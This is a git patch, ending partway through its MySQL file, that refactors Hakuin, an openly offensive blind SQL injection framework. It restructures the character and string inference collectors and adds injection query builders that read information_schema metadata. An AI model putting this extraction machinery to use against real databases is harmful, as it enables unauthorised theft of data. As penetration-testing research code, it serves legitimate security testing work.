From 9932d8dacdb465b592430a8cc5db7685c7431553 Mon Sep 17 00:00:00 2001 From: Jakub Pruzinec Date: Wed, 4 Oct 2023 19:13:22 +0800 Subject: [PATCH] major refactoring (DBMS, collectors) & unicode support --- .gitignore | 3 +- hakuin/Extractor.py | 76 +++-- hakuin/Model.py | 7 +- hakuin/collectors.py | 612 +++++++++++++++++++++++------------- hakuin/dbms/DBMS.py | 89 ++++-- hakuin/dbms/MySQL.py | 449 +++++++++++++++++--------- hakuin/dbms/SQLite.py | 381 +++++++++++++++------- hakuin/search_algorithms.py | 65 ++-- hakuin/utils/__init__.py | 4 +- tests/OfflineRequester.py | 13 +- tests/dbs/unicode.json | 7 + tests/dbs/unicode.sqlite | Bin 0 -> 20480 bytes tests/test_large_content.py | 50 +-- tests/test_large_schema.py | 5 + tests/test_online.py | 18 +- tests/test_small_schema.py | 29 ++ tests/test_unicode.py | 28 ++ 17 files changed, 1214 insertions(+), 622 deletions(-) create mode 100644 tests/dbs/unicode.json create mode 100644 tests/dbs/unicode.sqlite create mode 100644 tests/test_small_schema.py create mode 100644 tests/test_unicode.py diff --git a/.gitignore b/.gitignore index 9c37282..0f85595 100644 --- a/.gitignore +++ b/.gitignore @@ -162,4 +162,5 @@ cython_debug/ #.idea/ # Hakuin -tmp/ \ No newline at end of file +tmp/ +demos/ diff --git a/hakuin/Extractor.py b/hakuin/Extractor.py index 97f53f1..8f81a5a 100644 --- a/hakuin/Extractor.py +++ b/hakuin/Extractor.py @@ -1,7 +1,6 @@ import hakuin import hakuin.search_algorithms as search_alg import hakuin.collectors as collect -from hakuin.utils import CHARSET_SCHEMA @@ -33,24 +32,23 @@ class Extractor: ctx = search_alg.Context(None, None, None, None) - n_rows = search_alg.IntExponentialSearch( - self.requester, - self.dbms.count_tables, - upper=8 + n_rows = search_alg.IntExponentialBinarySearch( + requester=self.requester, + query_cb=self.dbms.TablesQueries.rows_count, + upper=8, + find_range=True, ).run(ctx) if strategy == 'binary': return collect.BinaryTextCollector( - self.requester, - self.dbms.char_tables, - charset=CHARSET_SCHEMA, + requester=self.requester, + queries=self.dbms.TablesQueries, ).run(ctx, n_rows) else: return collect.ModelTextCollector( - self.requester, - self.dbms.char_tables, + requester=self.requester, + queries=self.dbms.TablesQueries, model=hakuin.get_model_tables(), - charset=CHARSET_SCHEMA, ).run(ctx, n_rows) @@ -70,24 +68,23 @@ class Extractor: ctx = search_alg.Context(table, None, None, None) - n_rows = search_alg.IntExponentialSearch( - self.requester, - self.dbms.count_columns, - upper=8 + n_rows = search_alg.IntExponentialBinarySearch( + requester=self.requester, + query_cb=self.dbms.ColumnsQueries.rows_count, + upper=8, + find_range=True, ).run(ctx) if strategy == 'binary': return collect.BinaryTextCollector( - self.requester, - self.dbms.char_columns, - charset=CHARSET_SCHEMA, + requester=self.requester, + queries=self.dbms.ColumnsQueries, ).run(ctx, n_rows) else: return collect.ModelTextCollector( - self.requester, - self.dbms.char_columns, + requester=self.requester, + queries=self.dbms.ColumnsQueries, model=hakuin.get_model_columns(), - charset=CHARSET_SCHEMA, ).run(ctx, n_rows) @@ -104,15 +101,15 @@ class Extractor: ctx = search_alg.Context(table, column, None, None) d_type = search_alg.BinarySearch( - self.requester, - self.dbms.meta_type, + requester=self.requester, + query_cb=self.dbms.MetaQueries.column_data_type, values=self.dbms.DATA_TYPES, ).run(ctx) return { 'type': d_type, - 'nullable': self.requester.request(ctx, self.dbms.meta_is_nullable(ctx)), - 'pk': self.requester.request(ctx, 
self.dbms.meta_is_pk(ctx)),
+            'nullable': self.requester.request(ctx, self.dbms.MetaQueries.column_is_nullable(ctx)),
+            'pk': self.requester.request(ctx, self.dbms.MetaQueries.column_is_pk(ctx)),
        }
@@ -140,7 +137,7 @@ class Extractor:
        return schema
-    def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows=None, n_rows_guess=128):
+    def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
        '''Extracts text column.
        Params:
@@ -152,7 +149,6 @@ class Extractor:
                'dynamic' for dynamically choosing the best search strategy and
                opportunistically guessing strings
            charset (list|None): list of possible characters
-            n_rows (int|None): number of rows
-            n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set
+            n_rows_guess (int|None): approximate number of rows
        Returns:
@@ -162,32 +158,30 @@ class Extractor:
        assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
        ctx = search_alg.Context(table, column, None, None)
-
-        if n_rows is None:
-            n_rows = search_alg.IntExponentialSearch(
-                self.requester,
-                self.dbms.count_rows,
-                upper=n_rows_guess
-            ).run(ctx)
+        n_rows = search_alg.IntExponentialBinarySearch(
+            requester=self.requester,
+            query_cb=self.dbms.RowsQueries.rows_count,
+            upper=n_rows_guess,
+            find_range=True,
+        ).run(ctx)
        if strategy == 'binary':
            return collect.BinaryTextCollector(
-                self.requester,
-                self.dbms.char_rows,
+                requester=self.requester,
+                queries=self.dbms.RowsQueries,
                charset=charset,
            ).run(ctx, n_rows)
        elif strategy in ['unigram', 'fivegram']:
            ngram = 1 if strategy == 'unigram' else 5
            return collect.AdaptiveTextCollector(
-                self.requester,
-                self.dbms.char_rows,
+                requester=self.requester,
+                queries=self.dbms.RowsQueries,
                model=hakuin.Model(ngram),
                charset=charset,
            ).run(ctx, n_rows)
        else:
            return collect.DynamicTextCollector(
-                self.requester,
-                self.dbms.char_rows,
-                self.dbms.string_rows,
+                requester=self.requester,
+                queries=self.dbms.RowsQueries,
                charset=charset,
            ).run(ctx, n_rows)
diff --git a/hakuin/Model.py b/hakuin/Model.py
index c2f6da8..d234c6b 100644
--- a/hakuin/Model.py
+++ b/hakuin/Model.py
@@ -26,8 +26,9 @@ class Model:
    @property
    def order(self):
-        assert self.model
-        return self.model.order
+        if self.model:
+            return self.model.order
+        return None
    def load(self, file):
@@ -49,7 +50,7 @@ class Model:
        Returns:
            dict: likelihood distribution
        '''
-        context = context[-(self.order - 1):]
+        context = [] if self.order == 1 else context[-(self.order - 1):]
        while context:
            scores = self._scores(context)
diff --git a/hakuin/collectors.py b/hakuin/collectors.py
index c27a653..6edb1cb 100644
--- a/hakuin/collectors.py
+++ b/hakuin/collectors.py
@@ -3,284 +3,544 @@
from abc import ABCMeta, abstractmethod
from collections import Counter
import hakuin
-from hakuin.utils import tokenize, CHARSET_ASCII, EOS
+from hakuin.utils import tokenize, CHARSET_ASCII, EOS, ASCII_MAX, UNICODE_MAX
from hakuin.utils.huffman import make_tree
-from hakuin.search_algorithms import Context, BinarySearch, TreeSearch
+from hakuin.search_algorithms import Context, BinarySearch, TreeSearch, IntExponentialBinarySearch
class Collector(metaclass=ABCMeta):
    '''Abstract class for collectors. Collectors repeatedly run
-    search algorithms to infer column rows.
+    search algorithms to extract column rows.
    '''
-    def __init__(self, requester, query_cb):
+    def __init__(self, requester, queries):
        '''Constructor.
Params: requester (Requester): Requester instance - query_cb (function): query construction function + queries (UniformQueries): injection queries ''' self.requester = requester - self.query_cb = query_cb + self.queries = queries - def run(self, ctx, n_rows): - '''Run collection. + def run(self, ctx, n_rows, *args, **kwargs): + '''Collects the whole column. Params: - ctx (Context): inference context + ctx (Context): extraction context n_rows (int): number of rows in column Returns: list: column rows ''' - logging.info(f'Inferring "{ctx.table}.{ctx.column}"...') + logging.info(f'Inferring "{ctx.table}.{ctx.column}"') data = [] for row in range(n_rows): ctx = Context(ctx.table, ctx.column, row, None) - res = self._collect_row(ctx) + res = self.collect_row(ctx, *args, **kwargs) data.append(res) - logging.info(f'({row + 1}/{n_rows}) inferred: {res}') + logging.info(f'({row + 1}/{n_rows}) "{ctx.table}.{ctx.column}": {res}') return data @abstractmethod - def _collect_row(self, ctx): + def collect_row(self, ctx, *args, **kwargs): + '''Collects a row. + + Params: + ctx (Context): extraction context + + Returns: + value: single row + ''' raise NotImplementedError() class TextCollector(Collector): '''Collector for text columns.''' - def _collect_row(self, ctx): + def __init__(self, requester, queries, charset=None): + '''Constructor. + + Params: + requester (Requester): Requester instance + queries (UniformQueries): injection queries + charset (list|None): list of possible characters, None for default ASCII + ''' + super().__init__(requester, queries) + self.charset = charset if charset is not None else CHARSET_ASCII + if EOS not in self.charset: + self.charset.append(EOS) + + + def run(self, ctx, n_rows): + '''Collects the whole column. + + Params: + ctx (Context): extraction context + n_rows (int): number of rows in column + + Returns: + list: column rows + ''' + rows_are_ascii = self.check_rows_are_ascii(ctx) + return super().run(ctx, n_rows, rows_are_ascii) + + + def collect_row(self, ctx, rows_are_ascii): + '''Collects a row. + + Params: + ctx (Context): extraction context + rows_are_ascii (bool): ASCII flag for all rows in column + + Returns: + string: single row + ''' + row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx) + ctx.s = '' while True: - c = self._collect_char(ctx) + c = self.collect_char(ctx, row_is_ascii) if c == EOS: return ctx.s ctx.s += c @abstractmethod - def _collect_char(self, ctx): + def collect_char(self, ctx, row_is_ascii): + '''Collects a character. + + Params: + ctx (Context): extraction context + row_is_ascii (bool): row ASCII flag + + Returns: + string: single character + ''' raise NotImplementedError() + def check_rows_are_ascii(self, ctx): + '''Finds out whether all rows in column are ASCII. + + Params: + ctx (Context): extraction context + + Returns: + bool: ASCII flag + ''' + query = self.queries.rows_are_ascii(ctx) + return self.requester.request(ctx, query) + + + def check_row_is_ascii(self, ctx): + '''Finds out whether current row is ASCII. + + Params: + ctx (Context): extraction context + + Returns: + bool: ASCII flag + ''' + query = self.queries.row_is_ascii(ctx) + return self.requester.request(ctx, query) + + + def check_char_is_ascii(self, ctx): + '''Finds out whether current character is ASCII. 
+
+        Params:
+            ctx (Context): extraction context
+
+        Returns:
+            bool: ASCII flag
+        '''
+        query = self.queries.char_is_ascii(ctx)
+        return self.requester.request(ctx, query)
+
+
class BinaryTextCollector(TextCollector):
    '''Binary search text collector'''
-    def __init__(self, requester, query_cb, charset=None):
-        '''Constructor.
+    def collect_char(self, ctx, row_is_ascii):
+        '''Collects a character.
        Params:
-            requester (Requester): Requester instance
-            query_cb (function): query construction function
-            charset (list|None): list of possible characters
+            ctx (Context): extraction context
+            row_is_ascii (bool): row ASCII flag
        Returns:
-            list: column rows
+            string: single character
        '''
-        super().__init__(requester, query_cb)
-        self.charset = charset if charset else CHARSET_ASCII
+        return self._collect_or_emulate_char(ctx, row_is_ascii)[0]
-    def _collect_char(self, ctx):
-        return BinarySearch(
-            self.requester,
-            self.query_cb,
-            values=self.charset,
-        ).run(ctx)
+    def emulate_char(self, ctx, row_is_ascii, correct):
+        '''Emulates character collection without sending requests.
+
+        Params:
+            ctx (Context): extraction context
+            row_is_ascii (bool): row ASCII flag
+            correct (str): correct character
+
+        Returns:
+            int: number of requests necessary
+        '''
+        return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1]
+
+
+    def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None):
+        total_queries = 0
+
+        # custom charset or ASCII
+        if self.charset is not CHARSET_ASCII or row_is_ascii or self._check_or_emulate_char_is_ascii(ctx, correct):
+            search_alg = BinarySearch(
+                requester=self.requester,
+                query_cb=self.queries.char,
+                values=self.charset,
+                correct=correct,
+            )
+            res = search_alg.run(ctx)
+            total_queries += search_alg.n_queries
+
+            if res is not None:
+                return res, total_queries
+
+        # Unicode
+        correct_ord = ord(correct) if correct is not None else correct
+        search_alg = IntExponentialBinarySearch(
+            requester=self.requester,
+            query_cb=self.queries.char_unicode,
+            lower=ASCII_MAX + 1,
+            upper=UNICODE_MAX + 1,
+            find_range=False,
+            correct=correct_ord,
+        )
+        res = search_alg.run(ctx)
+        total_queries += search_alg.n_queries
+
+        return chr(res), total_queries
+
+
+    def _check_or_emulate_char_is_ascii(self, ctx, correct):
+        if correct is None:
+            return self.check_char_is_ascii(ctx)
+        return correct.isascii()
class ModelTextCollector(TextCollector):
    '''Language model-based text collector.'''
-    def __init__(self, requester, query_cb, model, charset=None):
+    def __init__(self, requester, queries, model, charset=None):
        '''Constructor.
        Params:
            requester (Requester): Requester instance
-            query_cb (function): query construction function
+            queries (UniformQueries): injection queries
            model (Model): language model
            charset (list|None): list of possible characters
-
-        Returns:
-            list: column rows
        '''
-        super().__init__(requester, query_cb)
+        super().__init__(requester, queries, charset)
        self.model = model
-        self.charset = charset if charset else CHARSET_ASCII
+        self.binary_collector = BinaryTextCollector(
+            requester=self.requester,
+            queries=self.queries,
+            charset=self.charset,
+        )
-    def _collect_char(self, ctx):
+    def collect_char(self, ctx, row_is_ascii):
+        '''Collects a character.
+
+        Params:
+            ctx (Context): extraction context
+            row_is_ascii (bool): row ASCII flag
+
+        Returns:
+            string: single character
        '''
+        return self._collect_or_emulate_char(ctx, row_is_ascii)[0]
+
+
+    def emulate_char(self, ctx, row_is_ascii, correct):
+        '''Emulates character collection without sending requests.
+
+        Params:
+            ctx (Context): extraction context
+            row_is_ascii (bool): row ASCII flag
+            correct (str): correct character
+
+        Returns:
+            int: number of requests necessary
+        '''
+        return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1]
+
+
+    def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None):
+        n_queries_model = 0
+
        model_ctx = tokenize(ctx.s, add_eos=False)
        scores = self.model.scores(context=model_ctx)
-        c = TreeSearch(
-            self.requester,
-            self.query_cb,
+        search_alg = TreeSearch(
+            requester=self.requester,
+            query_cb=self.queries.char,
            tree=make_tree(scores),
-        ).run(ctx)
+            correct=correct,
+        )
+        res = search_alg.run(ctx)
+        n_queries_model = search_alg.n_queries
-        if c is not None:
-            return c
+        if res is not None:
+            return res, n_queries_model
-        charset = list(set(self.charset).difference(set(scores)))
-        return BinarySearch(
-            self.requester,
-            self.query_cb,
-            values=self.charset,
-        ).run(ctx)
+        res, n_queries_binary = self.binary_collector._collect_or_emulate_char(ctx, row_is_ascii, correct)
+        return res, n_queries_model + n_queries_binary
class AdaptiveTextCollector(ModelTextCollector):
    '''Same as ModelTextCollector but adapts the model.'''
-    def _collect_char(self, ctx):
-        c = super()._collect_char(ctx)
+    def collect_char(self, ctx, row_is_ascii):
+        c = super().collect_char(ctx, row_is_ascii)
        self.model.fit_correct_char(c, partial_str=ctx.s)
        return c
+class DynamicTextStats:
+    '''Helper class of DynamicTextCollector to keep track of statistical information.'''
+    def __init__(self):
+        self.str_len_mean = 0.0
+        self.n_strings = 0
+        self._rpc = {
+            'binary': {'mean': 0.0, 'hist': []},
+            'unigram': {'mean': 0.0, 'hist': []},
+            'fivegram': {'mean': 0.0, 'hist': []},
+        }
+
+
+    def update_str(self, s):
+        self.n_strings += 1
+        self.str_len_mean = (self.str_len_mean * (self.n_strings - 1) + len(s)) / self.n_strings
+
+
+    def update_rpc(self, strategy, n_queries):
+        rpc = self._rpc[strategy]
+        rpc['hist'].append(n_queries)
+        rpc['hist'] = rpc['hist'][-100:]
+        rpc['mean'] = sum(rpc['hist']) / len(rpc['hist'])
+
+
+    def rpc(self, strategy):
+        return self._rpc[strategy]['mean']
+
+
+    def best_strategy(self):
+        return min(self._rpc, key=lambda strategy: self.rpc(strategy))
+
+
+
class DynamicTextCollector(TextCollector):
    '''Dynamic text collector. The collector keeps statistical information
    (RPC) for several strategies (binary search, unigram, and five-gram)
    and dynamically chooses the best one. In addition, it uses the
    statistical information to identify when guessing whole strings is
    likely to succeed and then uses previously inferred strings to make
    the guesses.
+    '''
+    def __init__(self, requester, queries, charset=None):
+        '''Constructor.
-
-    Attributes:
-        GUESS_TH (float): success probability threshold necessary to make guesses
-        GUESS_SCORE_TH (float): minimal necessary probability to be included in guess tree
+
+        Params:
+            requester (Requester): Requester instance
+            queries (UniformQueries): injection queries
+            charset (list|None): list of possible characters
+
+        Other Attributes:
+            model_unigram (Model): adaptive unigram model
+            model_fivegram (Model): adaptive five-gram model
+            guess_collector (StringGuessingCollector): collector for guessing
+        '''
+        super().__init__(requester, queries, charset)
+        self.binary_collector = BinaryTextCollector(
+            requester=self.requester,
+            queries=self.queries,
+            charset=self.charset,
+        )
+        self.unigram_collector = ModelTextCollector(
+            requester=self.requester,
+            queries=self.queries,
+            model=hakuin.Model(1),
+            charset=self.charset,
+        )
+        self.fivegram_collector = ModelTextCollector(
+            requester=self.requester,
+            queries=self.queries,
+            model=hakuin.Model(5),
+            charset=self.charset,
+        )
+        self.guess_collector = StringGuessingCollector(
+            requester=self.requester,
+            queries=self.queries,
+        )
+        self.stats = DynamicTextStats()
+
+
+    def collect_row(self, ctx, rows_are_ascii):
+        row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx)
+
+        s = self._collect_string(ctx, row_is_ascii)
+        self.guess_collector.model.fit_single(s, context=[])
+        self.stats.update_str(s)
+
+        return s
+
+
+    def _collect_string(self, ctx, row_is_ascii):
+        '''Tries to guess strings or extracts them on a per-character basis if guessing fails.'''
+        exp_c = self.stats.str_len_mean * self.stats.rpc(self.stats.best_strategy())
+        correct_str = self.guess_collector.collect_row(ctx, exp_c)
+
+        if correct_str is not None:
+            self._update_stats_str(ctx, row_is_ascii, correct_str)
+            self.unigram_collector.model.fit_data([correct_str])
+            self.fivegram_collector.model.fit_data([correct_str])
+            return correct_str
+
+        return self._collect_string_per_char(ctx, row_is_ascii)
+
+
+    def _collect_string_per_char(self, ctx, row_is_ascii):
+        ctx.s = ''
+        while True:
+            c = self.collect_char(ctx, row_is_ascii)
+            self._update_stats(ctx, row_is_ascii, c)
+            self.unigram_collector.model.fit_correct_char(c, partial_str=ctx.s)
+            self.fivegram_collector.model.fit_correct_char(c, partial_str=ctx.s)
+
+            if c == EOS:
+                return ctx.s
+            ctx.s += c
+
+
+    def collect_char(self, ctx, row_is_ascii):
+        '''Chooses the best strategy and uses it to infer a character.'''
+        best = self.stats.best_strategy()
+        if best == 'binary':
+            return self.binary_collector.collect_char(ctx, row_is_ascii)
+        elif best == 'unigram':
+            return self.unigram_collector.collect_char(ctx, row_is_ascii)
+        else:
+            return self.fivegram_collector.collect_char(ctx, row_is_ascii)
+
+
+    def _update_stats(self, ctx, row_is_ascii, correct):
+        '''Emulates all strategies without sending requests and updates the statistical information.'''
+        collectors = (
+            ('binary', self.binary_collector),
+            ('unigram', self.unigram_collector),
+            ('fivegram', self.fivegram_collector),
+        )
+
+        for strategy, collector in collectors:
+            n_queries = collector.emulate_char(ctx, row_is_ascii, correct)
+            self.stats.update_rpc(strategy, n_queries)
+
+
+    def _update_stats_str(self, ctx, row_is_ascii, correct_str):
+        '''Like _update_stats but for whole strings.'''
+        ctx.s = ''
+        for c in correct_str:
+            self._update_stats(ctx, row_is_ascii, c)
+            ctx.s += c
+
+
+
+class
StringGuessingCollector(Collector): + '''String guessing collector. The collector keeps track of previously extracted + strings and opportunistically tries to guess new strings. ''' GUESS_TH = 0.5 GUESS_SCORE_TH = 0.01 - def __init__(self, requester, query_char_cb, query_string_cb, charset=None): + def __init__(self, requester, queries): '''Constructor. Params: requester (Requester): Requester instance - query_char_cb (function): query construction function for searching characters - query_string_cb (function): query construction function for searching strings - charset (list|None): list of possible characters + queries (UniformQueries): injection queries Other Attributes: - model_guess: adaptive string-based model for guessing - model_unigram: adaptive unigram model - model_fivegram: adaptive five-gram model + GUESS_TH (float): minimal threshold necessary to start guessing + GUESS_SCORE_TH (float): minimal threshold for strings to be eligible for guessing + model (Model): adaptive string-based model for guessing ''' - self.requester = requester - self.query_char_cb = query_char_cb - self.query_string_cb = query_string_cb - self.charset = charset if charset else CHARSET_ASCII - self.model_guess = hakuin.Model(1) - self.model_unigram = hakuin.Model(1) - self.model_fivegram = hakuin.Model(5) - self._stats = { - 'rpc': { - 'binary': {'avg': 0.0, 'hist': []}, - 'unigram': {'avg': 0.0, 'hist': []}, - 'fivegram': {'avg': 0.0, 'hist': []}, - }, - 'avg_len': 0.0, - 'n_strings': 0, - } + super().__init__(requester, queries) + self.model = hakuin.Model(1) - def _collect_row(self, ctx): - s = self._collect_string(ctx) - self.model_guess.fit_single(s, context=[]) + def collect_row(self, ctx, exp_alt=None): + '''Tries to construct a guessing Huffman tree and searches it in case of success. - self._stats['n_strings'] += 1 + Params: + ctx (Context): extraction context + exp_alt (float|None): expectation for alternative extraction method or None if it does not exist - total = self._stats['avg_len'] * (self._stats['n_strings'] - 1) + len(s) - self._stats['avg_len'] = total / self._stats['n_strings'] - return s - - - def _collect_string(self, ctx): - '''Identifies if guessings strings is likely to succeed and if yes, it makes guesses. - If guessing does not take place or fails, it proceeds with per-character inference. 
+
+        Returns:
+            string|None: guessed string or None if skipped or failed
        '''
-        correct_str = self._try_guessing(ctx)
-
-        if correct_str is not None:
-            self._update_stats_str(ctx, correct_str)
-            self.model_unigram.fit_data([correct_str])
-            self.model_fivegram.fit_data([correct_str])
-            return correct_str
-
-        ctx.s = ''
-        while True:
-            c = self._collect_char(ctx)
-
-            self._update_stats(ctx, c)
-            self.model_unigram.fit_correct_char(c, partial_str=ctx.s)
-            self.model_fivegram.fit_correct_char(c, partial_str=ctx.s)
-
-            if c == EOS:
-                return ctx.s
-
-            ctx.s += c
-
-
-    def _collect_char(self, ctx):
-        '''Chooses the best strategy and uses it to infer a character.'''
-        searched_space = set()
-        c = self._get_strategy(ctx, searched_space, self._best_strategy()).run(ctx)
-        if c is None:
-            c = self._get_strategy(ctx, searched_space, 'binary').run(ctx)
-        return c
-
-
-    def _try_guessing(self, ctx):
-        '''Tries to construct a guessing Huffman tree and searches it in case of success.'''
-        tree = self._get_guess_tree(ctx)
+        exp_alt = exp_alt if exp_alt is not None else float('inf')
+        tree = self._get_guess_tree(ctx, exp_alt)
        return TreeSearch(
-            self.requester,
-            self.query_string_cb,
+            requester=self.requester,
+            query_cb=self.queries.string,
            tree=tree,
        ).run(ctx)
-    def _get_guess_tree(self, ctx):
+    def _get_guess_tree(self, ctx, exp_alt):
        '''Identifies whether string guessing is likely to succeed and if so, it constructs
        a Huffman tree from previously inferred strings.
+        Params:
+            ctx (Context): extraction context
+            exp_alt (float): expectation for alternative extraction method
+
        Returns:
-            utils.huffman.Node|None: Huffman tree constructed from previously inferred
-                strings that are likely to succeed or None if no such strings were found
+            utils.huffman.Node|None: Huffman tree constructed from previously inferred strings that are
+                likely to succeed or None if no such strings were found
        '''
-
-        # Expectation for per-character inference:
-        #   exp_c = avg_len * best_strategy_rpc
-        exp_c = self._stats['avg_len'] * self._stats['rpc'][self._best_strategy()]['avg']
-
        # Iteratively compute the best expectation "best_exp_g" by progressively inserting guess
        # strings into a candidate guess set "guesses" and computing their expectation "exp_g".
        # The iteration stops when the minimal "exp_g" is found.
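+        # A candidate guess set G pays only the Huffman tree search cost on a hit; on a
+        # miss it additionally pays the per-character fallback cost exp_alt: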
-        #   exp(G) = p(s in G) * exp_huff(G) + (1 - p(c in G)) * (exp_huff(G) + exp_c)
+        #   exp(G) = p(s in G) * exp_huff(G) + (1 - p(s in G)) * (exp_huff(G) + exp_alt)
        guesses = {}
        prob_g = 0.0
        best_prob_g = 0.0
        best_exp_g = float('inf')
        best_tree = None
-        scores = self.model_guess.scores(context=[])
-        scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model_guess.count(k, []) > 1}
+        scores = self.model.scores(context=[])
+        scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model.count(k, []) > 1}
        for guess, score in sorted(scores.items(), key=lambda x: x[1], reverse=True):
            guesses[guess] = score
            tree = make_tree(guesses)
            tree_cost = tree.search_cost()
            prob_g += score
-            exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_c)
+            exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_alt)
            if exp_g > best_exp_g:
                break
@@ -289,83 +549,7 @@ class DynamicTextCollector(TextCollector):
            best_prob_g = prob_g
            best_exp_g = exp_g
            best_tree = tree
-        if best_exp_g > exp_c or best_prob_g < self.GUESS_TH:
-            return None
+        if best_exp_g <= exp_alt and best_prob_g > self.GUESS_TH:
+            return best_tree
-        return best_tree
-
-
-    def _best_strategy(self):
-        '''Returns the name of the best strategy.'''
-        return min(self._stats['rpc'], key=lambda strategy: self._stats['rpc'][strategy]['avg'])
-
-
-    def _update_stats(self, ctx, correct):
-        '''Emulates all strategies without sending any requests and updates the
-        statistical information.
-        '''
-        for strategy in self._stats['rpc']:
-            searched_space = set()
-            search_alg = self._get_strategy(ctx, searched_space, strategy, correct)
-            res = search_alg.run(ctx)
-            n_queries = search_alg.n_queries
-            if res is None:
-                binary_search = self._get_strategy(ctx, searched_space, 'binary', correct)
-                binary_search.run(ctx)
-                n_queries += binary_search.n_queries
-
-            m = self._stats['rpc'][strategy]
-            m['hist'].append(n_queries)
-            m['hist'] = m['hist'][-100:]
-            m['avg'] = sum(m['hist']) / len(m['hist'])
-
-
-    def _update_stats_str(self, ctx, correct_str):
-        '''Like _update_stats but for whole strings'''
-        ctx.s = ''
-        for c in correct_str:
-            self._update_stats(ctx, c)
-            ctx.s += c
-
-
-    def _get_strategy(self, ctx, searched_space, strategy, correct=None):
-        '''Builds search algorithm configured to search appropriate space.
- - Params: - ctx (Context): inference context - searched_space (list): list of values that have already been searched - strategy (str): strategy ('binary', 'unigram', 'fivegram') - correct (str|None): correct character - - Returns: - SearchAlgorithm: configured search algorithm - ''' - if strategy == 'binary': - charset = list(set(self.charset).difference(searched_space)) - return BinarySearch( - self.requester, - self.query_char_cb, - values=self.charset, - correct=correct, - ) - elif strategy == 'unigram': - scores = self.model_unigram.scores(context=[]) - searched_space.union(set(scores)) - return TreeSearch( - self.requester, - self.query_char_cb, - tree=make_tree(scores), - correct=correct, - ) - else: - model_ctx = tokenize(ctx.s, add_eos=False) - model_ctx = model_ctx[-(self.model_fivegram.order - 1):] - scores = self.model_fivegram.scores(context=model_ctx) - - searched_space.union(set(scores)) - return TreeSearch( - self.requester, - self.query_char_cb, - tree=make_tree(scores), - correct=correct, - ) + return None diff --git a/hakuin/dbms/DBMS.py b/hakuin/dbms/DBMS.py index 28ee8c4..5d77aba 100644 --- a/hakuin/dbms/DBMS.py +++ b/hakuin/dbms/DBMS.py @@ -3,54 +3,75 @@ from abc import ABCMeta, abstractmethod -class DBMS(metaclass=ABCMeta): - RE_NORM = re.compile(r'[ \n]+') - - DATA_TYPES = [] - +class Queries(metaclass=ABCMeta): + '''Class for constructing SQL queries.''' + _RE_NORMALIZE = re.compile(r'[ \n]+') @staticmethod def normalize(s): - return DBMS.RE_NORM.sub(' ', s).strip() + return Queries._RE_NORMALIZE.sub(' ', s).strip() + @staticmethod + def hex(s): + return s.encode("utf-8").hex() + + + +class MetaQueries(Queries): + '''Interface for queries that infer DB metadata.''' @abstractmethod - def count_rows(self, ctx, n): - raise NotImplementedError() - + def column_data_type(self, ctx, values): raise NotImplementedError() @abstractmethod - def count_tables(self, ctx, n): - raise NotImplementedError() - + def column_is_nullable(self, ctx): raise NotImplementedError() @abstractmethod - def count_columns(self, ctx, n): - raise NotImplementedError() + def column_is_pk(self, ctx): raise NotImplementedError() - @abstractmethod - def meta_type(self, ctx, values): - raise NotImplementedError() - @abstractmethod - def meta_is_nullable(self, ctx): - raise NotImplementedError() +class UniformQueries(Queries): + '''Interface for queries that can be unified.''' @abstractmethod - def meta_is_pk(self, ctx): - raise NotImplementedError() + def rows_count(self, ctx): raise NotImplementedError() + @abstractmethod + def rows_are_ascii(self, ctx): raise NotImplementedError() + @abstractmethod + def row_is_ascii(self, ctx): raise NotImplementedError() + @abstractmethod + def char_is_ascii(self, ctx): raise NotImplementedError() + @abstractmethod + def char(self, ctx): raise NotImplementedError() + @abstractmethod + def char_unicode(self, ctx): raise NotImplementedError() + @abstractmethod + def string(self, ctx, values): raise NotImplementedError() - @abstractmethod - def char_rows(self, ctx, values): - raise NotImplementedError() - @abstractmethod - def char_tables(self, ctx, values): - raise NotImplementedError() - @abstractmethod - def char_columns(self, ctx, values): - raise NotImplementedError() +class DBMS(metaclass=ABCMeta): + '''Database Management System (DBMS) interface. 
-
-    @abstractmethod
-    def string_rows(self, ctx, values):
-        raise NotImplementedError()
+
+    Attributes:
+        DATA_TYPES (list): all data types available
+        MetaQueries (MetaQueries): queries for extracting metadata
+        TablesQueries (UniformQueries): queries for extracting table names
+        ColumnsQueries (UniformQueries): queries for extracting column names
+        RowsQueries (UniformQueries): queries for extracting rows
+    '''
+    _RE_ESCAPE = re.compile(r'[a-zA-Z0-9_#@]+')
+
+    DATA_TYPES = []
+
+    MetaQueries = None
+    TablesQueries = None
+    ColumnsQueries = None
+    RowsQueries = None
+
+
+    @staticmethod
+    def escape(s):
+        if DBMS._RE_ESCAPE.fullmatch(s):
+            return s
+        assert ']' not in s, f'Cannot escape "{s}"'
+        return f'[{s}]'
diff --git a/hakuin/dbms/MySQL.py b/hakuin/dbms/MySQL.py
index 292e7ad..012f975 100644
--- a/hakuin/dbms/MySQL.py
+++ b/hakuin/dbms/MySQL.py
@@ -1,9 +1,298 @@
-from hakuin.utils import EOS
+from hakuin.utils import EOS, ASCII_MAX
-from .DBMS import DBMS
+from .DBMS import DBMS, MetaQueries, UniformQueries
+class MySQLMetaQueries(MetaQueries):
+    def column_data_type(self, ctx, values):
+        values = [f"'{v}'" for v in values]
+        query = f'''
+            SELECT lower(DATA_TYPE) in ({','.join(values)})
+            FROM information_schema.columns
+            WHERE TABLE_SCHEMA=database() AND
+                  TABLE_NAME=x'{self.hex(ctx.table)}' AND
+                  COLUMN_NAME=x'{self.hex(ctx.column)}'
+        '''
+        return self.normalize(query)
+
+
+    def column_is_nullable(self, ctx):
+        query = f'''
+            SELECT IS_NULLABLE='YES'
+            FROM information_schema.columns
+            WHERE TABLE_SCHEMA=database() AND
+                  TABLE_NAME=x'{self.hex(ctx.table)}' AND
+                  COLUMN_NAME=x'{self.hex(ctx.column)}'
+        '''
+        return self.normalize(query)
+
+
+    def column_is_pk(self, ctx):
+        query = f'''
